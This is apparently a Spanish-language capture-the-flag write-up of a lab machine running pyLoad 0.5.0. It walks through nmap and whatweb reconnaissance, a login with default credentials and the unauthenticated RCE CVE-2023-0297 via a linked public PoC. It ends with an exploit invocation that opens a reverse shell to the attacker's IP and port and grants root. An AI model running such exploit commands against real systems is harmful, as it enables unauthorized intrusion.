MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)
Last updated
Last updated
Enumere los puertos de la maquina utilizando lo siguientes comandos:
# datos de los comandos:
-p-: indica que realize el escaneo en los 65365 puertos
--open: indica que solo muestre los puertos abiertos
--min-rate 4000: lo use para que envie no menos de 4000 paquetes por segundo.
-sS: realiza un escaneo sigiloso, en lugar de completar la conexión con un ACK,
Nmap envía un **RST** (reset), evitando establecer una conexión completa.
-v: muestra por consola los puertos que se encuentran abiertos
-Pn: deshabilita la deteccion de hosts.
Seguidamente como obtuve solo 2 puertos ejecute nmap con lo parámetro "-sCV" para que me muestre los servicios y la versiones de esos servicios.
Como tengo un servidor web en el puerto 9666 con whatweb voy a ver las tecnologías que emplean en dicho servidor.
Ya al tener los resultado de whatweb, ingreso al sitio web para realizar un reconocimiento mas cómodo.
Luego de cargar la web, encontré un panel de login de un software llamado "pyLoad", probé credenciales por defecto como en toda prueba y no resulto.
Pase por google para ver si existen credenciales que vengan por defecto.
Luego use las encontradas, una vez colocada obtuve acceso dentro del panel administrador.
Tengo la versión del software es la 0.5.0. Con la versión en la mano busque si contiene alguna vulnerabilidad en google.
https://github.com/JacobEbben/CVE-2023-0297
Este software es vulnerable a un RCE no autenticado por lo que no necesariamente necesitaría las credenciales.
Primero ejecute el siguiente comando donde me indico un PoC.
Reemplace los comandos y le agregue mi IP y un puerto .. esto va a realizar una conexión con mi kali.
Ejecute el exploit y accedí dentro de la maquina como root.
python3 exploit.py -t
-I 192.168.45.240 -P 4443